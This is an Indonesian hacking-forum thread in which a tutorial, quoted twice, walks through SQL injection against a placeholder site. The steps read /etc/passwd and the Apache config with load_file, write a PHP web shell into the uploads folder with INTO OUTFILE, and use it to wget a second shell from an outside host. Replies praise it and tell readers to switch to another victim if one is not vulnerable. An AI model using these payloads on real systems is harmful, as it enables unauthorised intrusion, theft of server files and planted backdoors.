[Share] SQL Injection Load File
#11
Ijin nyobain dulu, semoga masih banyak target.

#12
nice share broo,
tapi ane bingung cara nyari path nya gimana yaa bro ? :3
soalnya kalau pake /etc/passwd malah blank,, gak ada apa2,,
mungkin path /etc/passwd di protect atau emang gak di simpan disitu :3
mohon bantuannya om wine :3

#13
(01-30-2015, 09:06 PM)Hankz Wrote: ngga ketemu pathnya bro,harus gimana lagi yaa cari pathnya bro?
klu ngak ketemu berarti ngak vuln bro , coba ganti target

(06-01-2014, 11:38 PM)wine trochanter Wrote: Assalamualaikum
numpang spam yee
langsung saja,
keuntungannya disini gak perlu page admin buat upload backdoor nya

target
https://www.target.com/ajax_city_all_bra...ate=PANAJI

kasih tanda petik
https://www.target.com/ajax_city_all_bra...ate=PANAJI'
Spoiler! :
[Image: 2.jpg]

error sqli, gunakan perintah order by 2--
Spoiler! :
[Image: 3.jpg]

sekarang di ganti seperti ini
https://www.target.com/ajax_city_all_bra...ate=PANAJI' order by 1--+
sudah tidak error Tongue
Spoiler! :
[Image: 4.jpg]

sekarang gunakan https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select 1--+
Spoiler! :
[Image: 5.jpg]

liat user nya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select user()--+
Spoiler! :
[Image: 6.jpg]

nahh root
syarat melakukan ini ada 2

For creating any file on the website with SQL queries two things are most important

Smile
1) Root Path ( We have it by ERROR Smile
2) File Privilages for the Current MySQl User Big Grin we have File Privilages as well Big Grin

artiin sendiri yah Smile)

selanjutnya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select load_file(0x2f6574632f706173737764)--+
ctrl+u dah
Spoiler! :
[Image: 7.jpg]

nah selanjutnya kita liat path nya biar bisa tau upload nya kemana, mungkin itu bahasa awam nya bagi saya Big Grin

https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+
Spoiler! :
[Image: 8.jpg]

sebelum nya ane tes dlu buka path nya misal
https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak

https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt

"wine ganteng" nya di ubah ke hex yah Big Grin
Spoiler! :
[Image: 9.jpg]

Coba sekarang kita masukan ini buat mendonwload bekdor Tongue
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -
Spoiler! :
[Image: 10.jpg]

Kemudian kita gunakan wget untuk mendonlot shell yg ekstensi .txt
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
terus kita ubah ekstensi txt ke php
mv a.txt index(3)php

terus buka dah
Spoiler! :
[Image: 12.jpg]

sekian dan terima kasih Big Grin
gretz to ch3rn0by1 | tr0jan | G_26 | IBT SEMARANG and you :*
ada yang lebih simple lagi om , pke sqlmap Big Grin
nice share om Big Grin
Djoe | Psycho Security |[email protected]

#14
Om wine keren nih Big Grin
Quote:~ Tan Hana Wighna Tan Sirna ~

#15
(06-01-2014, 11:38 PM)wine trochanter Wrote: Assalamualaikum
numpang spam yee
langsung saja,
keuntungannya disini gak perlu page admin buat upload backdoor nya

target
https://www.target.com/ajax_city_all_bra...ate=PANAJI

kasih tanda petik
https://www.target.com/ajax_city_all_bra...ate=PANAJI'
Spoiler! :
[Image: 2.jpg]

error sqli, gunakan perintah order by 2--
Spoiler! :
[Image: 3.jpg]

sekarang di ganti seperti ini
https://www.target.com/ajax_city_all_bra...ate=PANAJI' order by 1--+
sudah tidak error Tongue
Spoiler! :
[Image: 4.jpg]

sekarang gunakan https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select 1--+
Spoiler! :
[Image: 5.jpg]

liat user nya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select user()--+
Spoiler! :
[Image: 6.jpg]

nahh root
syarat melakukan ini ada 2

For creating any file on the website with SQL queries two things are most important

Smile
1) Root Path ( We have it by ERROR Smile
2) File Privilages for the Current MySQl User Big Grin we have File Privilages as well Big Grin

artiin sendiri yah Smile)

selanjutnya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select load_file(0x2f6574632f706173737764)--+
ctrl+u dah
Spoiler! :
[Image: 7.jpg]

nah selanjutnya kita liat path nya biar bisa tau upload nya kemana, mungkin itu bahasa awam nya bagi saya Big Grin

https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+
Spoiler! :
[Image: 8.jpg]

sebelum nya ane tes dlu buka path nya misal
https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak

https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt

"wine ganteng" nya di ubah ke hex yah Big Grin
Spoiler! :
[Image: 9.jpg]

Coba sekarang kita masukan ini buat mendonwload bekdor Tongue
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -
Spoiler! :
[Image: 10.jpg]

Kemudian kita gunakan wget untuk mendonlot shell yg ekstensi .txt
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
terus kita ubah ekstensi txt ke php
mv a.txt index(3)php

terus buka dah
Spoiler! :
[Image: 12.jpg]

sekian dan terima kasih Big Grin
gretz to ch3rn0by1 | tr0jan | G_26 | IBT SEMARANG and you :*

Still GOLD om =))


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do



#16
masih keren nih, Bug Old School but Never die Big Grin ..
Jangan Makan Tulang Kawan | Kurawa |






Users browsing this thread: 1 Guest(s)